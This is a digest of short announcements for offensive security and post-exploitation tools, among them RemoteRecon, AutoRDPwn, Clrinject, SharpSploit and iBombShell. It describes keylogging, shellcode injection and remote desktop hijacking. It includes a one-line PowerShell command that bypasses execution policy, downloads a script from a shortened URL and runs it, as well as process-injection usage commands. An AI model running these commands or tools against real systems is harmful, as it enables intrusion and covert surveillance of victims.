RemoteRecon – Remote Recon And Collection

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host, without having to expose your complete toolkit/agent. Often times as operator’s we need to compromise a host, just so we can keylog or screenshot (or some other miniscule task) against a person/host of interest. Why should you have to push over beacon, empire, innuendo, meterpreter, or a custom RAT to the target? This increases the footprint that you have in the target environment, exposes functionality in your agent, and most likely your C2 infrastructure. An alternative would be to deploy a secondary agent to targets of interest and collect intelligence. Then store this data for retrieval at your discretion. If these compromised endpoints are discovered by IR teams, you lose those endpoints and the information you’ve collected, but nothing more. Below is a visual representation of how an adversary would utilize this.RemoteRecon utilizes the registry for data storage, with WMI as an internal C2 channel. All commands are executed in a asynchronous, push and pull manner. Meaning that you will send commands via the powershell controller and then retrieve the results of that command via the registry. All results will be displayed in the local console.Current CapabilitiesPowerShellScreenshotToken ImpersonationInject ReflectiveDll (Must Export the ReflectiveLoader function from Stephen Fewer)Inject ShellcodeKeylogImprovements, Additions, ToDo’s:Dynamically Load and execute .NET assembliesSupport non reflective dll’s for injectionBuild DependeciesThe RemoteRecon.ps1 script already contains a fully weaponized JS payload for the Agent. The payload will only be updated as the code base changes.If you wish to make changes to the codebase on your own, there are a few depencies required.Visual Studio 2015+Windows 7 and .NET SDKWindows 8.1 SDKmscorlib.tlh (This is included in the project but there are instances where intellisense can’t seem to find it [shrug]).NET 3.5 & 4James Forshaw’s DotNetToJScript projectFody/Costura Nuget package. Package and embed any extra dependencies in .NET.For a short setup guide, please visit the wikiDownload RemoteRecon

Link: http://feedproxy.google.com/~r/PentestTools/~3/yXXX3vBqgJk/remoterecon-remote-recon-and-collection.html

AutoRDPwn – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.0• Fixed a bug in the scheduled task to remove the user AutoRDPwn• The Scheluded Task attack has been replaced by Invoke-Command• It is now possible to choose the language of the application and launch the attack on English versions of Windows*The rest of the changes can be consulted in the CHANGELOG fileUseExecution in a line:powershell -ExecutionPolicy Bypass “cd $ env: TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1;. \ AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatzContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/FJO5eg5Xcpk/autordpwn-shadow-attack-framework.html

Clrinject – Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

Injects C# EXE or DLL Assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process’s classes and therefore affect it’s internal state.Usageclrinject-cli.exe -p -a <assemblyFile>Opens process with id <processId> or name <processName>, inject <assemblyFile> EXE and execute Main method.Additional options-e Enumerates all loaded CLR Runtimes and created AppDomains.-d <#> Inject only into <#>-th AppDomain. If no number or zero is specified, assembly is injected into every AppDomain.-i <namespace>.<className> Create an instance of class <className> from namespace <namespace>.ExamplesUsage examplesclrinject-cli.exe -p victim.exe -e(Enumerate Runtimes and AppDomains from victim.exe)clrinject-cli.exe -p 1234 -a “C:\Path\To\invader.exe" -d 2(Inject invader.exe into second AppDomain from process with id 1234)clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"(Create instance of Invader inside every AppDomain in victim.exe)clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"(Inject x64 assembly into x64 process)Injectable assembly exampleFollowing code can be compiled as C# executable and then injected into a PowerShell process. This code accessees static instances of internal PowerShell classes to change console text color to green.using System;using System.Reflection;using Microsoft.PowerShell;using System.Management.Automation.Host;namespace Invader{ class Invader { static void Main(string[] args) { try { var powerShellAssembly = typeof(ConsoleShell).Assembly; var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost"); var consoleHost = consoleHostType.GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic).GetValue(null); var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost); ui.RawUI.ForegroundColor = ConsoleColor.Green; } catch (Exception e) { Console.WriteLine(e.ToString()); } } }}Injection command:clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"Result:Download Clrinject

Link: http://feedproxy.google.com/~r/PentestTools/~3/pK8N-dwlNI8/clrinject-injects-c-exe-or-dll-assembly.html

Operating Offensively Against Sysmon

Sysmon is a tool written by Mark Russinovich that I have covered in multiple blog post and even wrote a PowerShell module called Posh-Sysmon to help with the generation of configuration files for it. Its main purpose is for the tracking of potentially malicious activity on individual hosts and it is based on the same technology as Procmon. It differs from other Sysinternals tools in that Sysmon is actually installed on the host and saves its information in to the Windows Eventlog so it is easier to be able to collect the information with the use of SIEM (Security Information and Event Management) tools. 
 Sysmon has the capability to log information for:
* Process Creation and Termination
* Process changing a file creation time.
* Network Connection
* Driver Load
* Image Load
* CreateRemoteThread
* Raw Access Read of a file
* A process opens another process memory
* File Creation
* Registry Events
* Pipe Events
* WMI Permanent Events 

Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

DbgShell – A PowerShell Front-End For The Windows Debugger Engine

A PowerShell front-end for the Windows debugger engine.Ready to tab your way to glory? For a quicker intro, take a look at Getting Started.DisclaimersThis project is not produced, endorsed, or monitored by the Windows debugger team. While the debugger team welcomes feedback about their API and front ends (windbg, kd, et al), they have no connection with this project. Do not file bugs or feedback to the debugger team concerning this project. This is not a funded project: it has no official resources allocated to it, and is only worked on by volunteers. Do not take any production dependency on this project unless you are willing to support it completely yourself. Feel free to file Issues and submit Pull Requests, but understand that with the limited volunteer resources, it may be a while before your submissions are handled. This is an experimental project: it is not fully baked, and you should expect breaking changes to be made often. Corollary of above disclaimers: I would avoid attaching DbgShell to live targets of high value.Binarieshttps://aka.ms/dbgshell-latestMotivationHave you ever tried automating anything in the debugger? (cdb/ntsd/kd/windbg) How did that go for you?The main impetus for DbgShell is that it’s just waaaay too hard to automate anything in the debugger. There are facilities today to assist in automating the debugger, of course. But in my opinion they are not meeting people’s needs.Using the built-in scripting language is arcane, limited, difficult to get right, and difficult to get help with.DScript is kind of neat, but virtually unknown, and it lacks a REPL, and it’s too low-level.Writing a full-blown debugger extension DLL is very powerful, but it’s a significant investment—way too expensive for solving quick, “one-off" problems as you debug random, real-world problems. Despite the cost, there are a large number of debugger extensions in existence. I think there should not be nearly so many; I think the only reason there are so many is because there aren’t viable alternatives.Existing attempts at providing a better interface (such as PowerDbg) are based on "scraping" and text parsing, which is hugely limiting (not to mention idealogically annoying) and thus are not able to fulfill the promise of a truly better interface (they are only marginally better, at best).Existing attempts to provide an easier way to write a debugger extension are merely a stop-gap addressing the pain of developing a debugger extension; they don’t really solve the larger problem. (for instance, two major shortcomings are: they are still too low-level (you have to deal with the dbgeng COM API), and there’s no REPL)The debugger team has recently introduce Javascript scripting. Javascript is a much better (and more well-defined) language than the old windbg scripting language, but I think that PowerShell has some advantages, the largest of which is that nobody really uses a Javascript shell–PowerShell is much better as a combined shell and scripting language.The goal of the DbgShell project is to bring the goodness of the object-based PowerShell world to the debugging world. When you do ‘dt’ to dump an ‘object’, you should get an actual object. Scripting should be as easy as writing a PowerShell script.The DbgShell project provides a PowerShell front-end for dbgeng.dll, including:a managed "object model" (usable from C# if you wished), which is higher-level than the dbgeng COM API,a PowerShell "navigation provider", which exposes aspects of a debugging target as a hierarchical namespace (so you can "cd" to a particular thread, type "dir" to see the stack, "cd" into a frame, do another "dir" to see locals/registers/etc.),cmdlets for manipulating the target,a custom PowerShell host which allows better control of the debugger CLI experience, as well as providing features not available in the standard powershell.exe host (namely, support for text colorization using ANSI escape codes (a la ISO/IEC 6429))The custom host is still a command-line (conhost.exe-based) program (analogous to ntsd/cdb/kd), but it can be invoked from windbg (!DbgShell).In addition to making automation much easier and more powerful, it will address other concerns as well, such as ease of use for people who don’t have to use the debuggers so often. (one complaint I’ve heard is that "when I end up needing to use windbg, I spend all my time in the .CHM")For seasoned windbg users, on the other hand, another goal is to make the transition as seamless as possible. So, for instance, the namespace provider is not the only way to access data; you can still use traditional commands like "~3 s", "k", etc.ScreenshotsNotable FeaturesColor: support for text colorization using ANSI escape codes (a la ISO/IEC 6429)Custom formatting engine: Don’t like .ps1xml stuff? Me neither. In addition to standard table, list, and custom views, you can define "single-line" views which are very handy for customizing symbol value displays.Custom symbol value conversion: For most variables, the default conversion and display are good. But sometimes, you’d like the debugger to do a little more work for you. The symbol value conversion feature allows, for instance, STL collection objects to be transformed into .NET collection objects that are much easier to deal with.Derived type detection: For when your variable is an IFoo, but the actual object is a FooImpl.Rich type information: exposed for your programmatic pleasure.Q: Does it work in WinDbg? I will only use WinDbg. A: Yes–load up the DbgShellExt.dll extension DLL, and then run "!dbgshell" to pop open a DbgShell console.Other topics Getting Started with DbgShell Color Custom formatting engine Custom symbol value conversion Derived type detection Rich type information Hacking on DbgShell DbgEngWrapper You can find a short (3 minute) video introduction here: https://youtu.be/ynbg2zZ1IgcDownload DbgShell

Link: http://feedproxy.google.com/~r/PentestTools/~3/Odr9tvWj8e0/dbgshell-powershell-front-end-for.html

SharpSploit – A .NET Post-Exploitation Library Written In C#

SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.SharpSploit is named, in part, as a homage to the PowerSploit project, a personal favorite of mine! While SharpSploit does port over some functionality from PowerSploit, my intention is not at all to create a direct port of PowerSploit. SharpSploit will be it’s own project, albeit with similar goals to PowerSploit.IntroYou’ll find some details and motivations for the SharpSploit project in this introductory blog post.DocumentationThe complete SharpSploit API docfx documentation is available here.For an easier to read, high-level quick reference and summary of SharpSploit functionality, refer to the SharpSploit – Quick Command Reference.CreditsSharpSploit ports many modules written in PowerShell by others, utilizes techniques discovered by others, and borrows ideas and code from other C# projects as well:Justin Bui (@youslydawg) – For contributing the SharpSploit.Enumeration.Host.CreateProcessDump() function.Matt Graeber (@mattifestation), Will Schroeder (@harmj0y), and Ruben (@FuzzySec) – For their work on PowerSploit.Will Schroeder (@harmj0y) – For the PowerView project.Alexander Leary (@0xbadjuju) – For the Tokenvator project.James Foreshaw (@tiraniddo) – For his discovery of the token duplication UAC bypass technique documented here.Matt Nelson (@enigma0x3) – For his Invoke-TokenDuplication implementation of the token duplication UAC bypass, as well his C# shellcode execution method.Benjamin Delpy (@gentilkiwi) – For the Mimikatz project.Casey Smith (@subtee) – For his work on a C# PE Loader.Chris Ross (@xorrior) – For his implementation of a Mimikatz PE Loader found here.Matt Graeber (@mattifestation) – For discovery of the AMSI bypass found here.Lee Christensen (@tifkin_) – For the discovery of the PowerShell logging bypass found here.All the contributors to www.pinvoke.net – For numerous PInvoke signatures.Download SharpSploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/egVvC26MSXU/sharpsploit-net-post-exploitation.html

Leaked? 2.0 – A Checking Tool For Hash Codes, Passwords And Emails Leaked

Leaked? is A Checking tool for Hash codes and Passwords and Emails leaked, uses leakz module from Aidan Holland, and leakz module uses API from Aurelius Wendelken.Leaked? can work in any OS if they have support Python 3 and 2.What’s new?Check email leakedUpdateMore friendly for usersSupport Python 2 and 3FeaturesCheck passwords leakedCheck hash code leakedCheck email leaked NEW!Update NEW!ExitAbout AuthorInstall and Run in Linuxsudo apt update && apt install python3 python3-pipgit clone https://github.com/GitHackTools/Leakedcd Leakedpip3 install -r requirements.txtpip install -r requirements.txtpython3 leaked.pyor python leaked.pyInstall and Run in WindowsDownload and run Python 3 setup file from Python.org. In Install Python 3 , enable Add Python 3.7 to PATH and For all usersDownload and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.After that, Run Command Propmt or PowerShell and enter this commands:git clone https://github.com/GitHackTools/Leakedcd Leakedpip install -r requirements.txtpython leaked.pyUpdate Leaked?: git pull -fNotesLeaked? uses leakz module from Aidan Holland, and leakz module uses API from Aurelius WendelkenLet follow their Twitter account!ScreenshotsContact to AuthorTwitter: @SecureGFFacebook: @GitHackToolsGoogle Plus: +TVT618Download Leaked

Link: http://feedproxy.google.com/~r/PentestTools/~3/ln-jAlMtxV8/leaked-20-checking-tool-for-hash-codes.html

Microsoft, Elon Musk, Kernel and Powershell – Paul’s Security Weekly #575

Microsoft accidentally lets encrypted Windows 10 out the the world, Kernel exploit discovered in macOS, PowerShell obfuscation ups the anty on anti virus, Google outlines incident response process, BombGar buys BeyondTrust, and Neil DeGrasse Tyson speaks on Elon Musk saying: Let the man Get High! All that and more, on this episode of Paul’s Security […]
The post Microsoft, Elon Musk, Kernel and Powershell – Paul’s Security Weekly #575 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/5xi_2xuShz4/

iBombShell: A Dynamic Post-Exploitation Remote Shell

PenTestIT RSS Feed
Consider you have a shell on a system and other post-exploitation do not work for you as they are being caught by a security solution on the system. Worry not as we now have iBombShell, a dynamic remote shell that can be run on any system that supports PowerShell. The reason this is called dynamicRead more about iBombShell: A Dynamic Post-Exploitation Remote Shell
The post iBombShell: A Dynamic Post-Exploitation Remote Shell appeared first on PenTestIT.

Link: http://pentestit.com/ibombshell-dynamic-post-exploitation-remote-shell/